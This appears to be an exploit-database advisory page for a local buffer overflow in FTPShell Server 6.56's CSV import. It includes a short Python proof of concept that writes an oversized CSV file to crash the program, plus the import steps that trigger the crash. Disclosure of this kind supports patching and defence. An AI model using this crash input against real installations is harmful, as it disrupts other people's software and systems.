FTPShell Server 6.56 Import CSV Buffer Overflow

Posted on 27 March 2017

[+] Title: FTPShell Server 6.56 - Import CSV Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: N/A

Vendor:
===============

www.ftpshell.com

Download:
===========

http://www.ftpshell.com/download.htm

Vulnerability Type:
===================

Local Buffer Overflow.

POC:
======
Dos = "A"*2047
file=open("C:\shell.csv","w")
file.write(Dos)
file.close()

1 - Manage FTP Accounts => Import From CSV = > Browse and import shell.csv = > Click in Import and Crashed :).

CVE Reference:
===============

N/A

Tested on:
===============

Windows 7

Win xp

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Relate Cross Site Scripting
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Insecure Direct Object Reference
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Insecure Direct Object Reference

Last 20